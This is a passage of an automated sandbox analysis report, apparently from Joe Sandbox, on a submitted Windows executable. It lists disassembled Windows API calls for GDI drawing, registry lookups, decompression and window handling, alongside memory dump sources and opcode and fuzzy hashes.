                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$C400C740F520860F522980
                                                                                            • String ID:
                                                                                            • API String ID: 2856677924-0
                                                                                            • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                            • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
                                                                                            • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                            • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
• Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
• Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
APIs
• SelectObject.GDI32(00000000,?), ref: 0041B480
• SelectObject.GDI32(?,00000000), ref: 0041B48F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
• SelectObject.GDI32(?,00000000), ref: 0041B4D7
• DeleteDC.GDI32(00000000), ref: 0041B4E0
• DeleteDC.GDI32(?), ref: 0041B4E9
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ObjectSelect$Delete$Stretch
• String ID:
• API String ID: 1458357782-0
• Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
• Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
• Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
APIs
• 73A0A570.USER32(00000000,?,?,00000000), ref: 00493979
  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
• SelectObject.GDI32(00000000,00000000), ref: 0049399B
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
• GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
• 73A0A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
Similarity
• API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 1435929781-222967699
• Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
• Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
• Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24
APIs
• GetCursorPos.USER32 ref: 004233BF
• WindowFromPoint.USER32(?,?), ref: 004233CC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
• GetCurrentThreadId.KERNEL32 ref: 004233E1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
• SetCursor.USER32(00000000), ref: 00423423
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
• Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
• Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
• Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
• API String ID: 667068680-2254406584
• Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
• Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
• Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE
APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
• GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
• CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
• API String ID: 2573145106-911929905
• Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
• Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
• Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
APIs
• GetProcAddress.KERNEL32(03100000,BZ2_bzDecompressInit), ref: 0045CDB1
• GetProcAddress.KERNEL32(03100000,BZ2_bzDecompress), ref: 0045CDC1
• GetProcAddress.KERNEL32(03100000,BZ2_bzDecompressEnd), ref: 0045CDD1
Similarity
• API ID: AddressProc
• String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
• API String ID: 190572456-212574377
• Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
• Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
• Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
• InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
  • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
  • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
  • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
• String ID: ChangeWindowMessageFilterEx$user32.dll
• API String ID: 142928637-2676053874
• Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
• Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
• Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
Similarity
• API ID: AddressProc$HandleModule
• String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
• API String ID: 667068680-222143506
• Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
• Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
• Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
APIs
• GetFocus.USER32 ref: 0041B755
• 73A0A570.USER32(?), ref: 0041B761
• 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
• 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
• 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
• 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A08830$A022A16310A570Focus
                                                                                            • String ID:
                                                                                            • API String ID: 3731147114-0
                                                                                            • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                            • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                                            • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                                            • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041BA27
                                                                                            • 73A0A570.USER32(?), ref: 0041BA33
                                                                                            • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                                            • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                                            • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A08830$A022A16310A570Focus
                                                                                            • String ID:
                                                                                            • API String ID: 3731147114-0
                                                                                            • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                            • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                                            • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                                            • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041B58E
                                                                                            • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                            • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                            • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                            • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: E680$A14620A480A570Focus
                                                                                            • String ID:
                                                                                            • API String ID: 932946509-0
                                                                                            • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                            • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                            • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                                            • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                            • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                            • API String ID: 1452528299-1580325520
                                                                                            • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                            • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                                            • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                                            • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                            • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                            • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                            • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                            • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A14620MetricsSystem$A480A570
                                                                                            • String ID:
                                                                                            • API String ID: 1130675633-0
                                                                                            • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                            • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                            • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                            • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                                            • LocalFree.KERNEL32(006A29F0,00000000,00401B68), ref: 00401ACF
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,006A29F0,00000000,00401B68), ref: 00401AEE
                                                                                            • LocalFree.KERNEL32(006A0DB8,?,00000000,00008000,006A29F0,00000000,00401B68), ref: 00401B2D
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                            • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                                            • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                            • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
                                                                                            • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
                                                                                            • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$Show
                                                                                            • String ID:
                                                                                            • API String ID: 3609083571-0
                                                                                            • Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                            • Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
                                                                                            • Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                                            • Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
                                                                                            APIs
                                                                                              • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                            • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                            • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                            • String ID:
                                                                                            • API String ID: 3527656728-0
                                                                                            • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                            • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                            • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                            • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID: $pI$.tmp$}RI
                                                                                            • API String ID: 3498533004-1860564545
                                                                                            • Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                            • Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
                                                                                            • Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                                            • Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
                                                                                            APIs
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
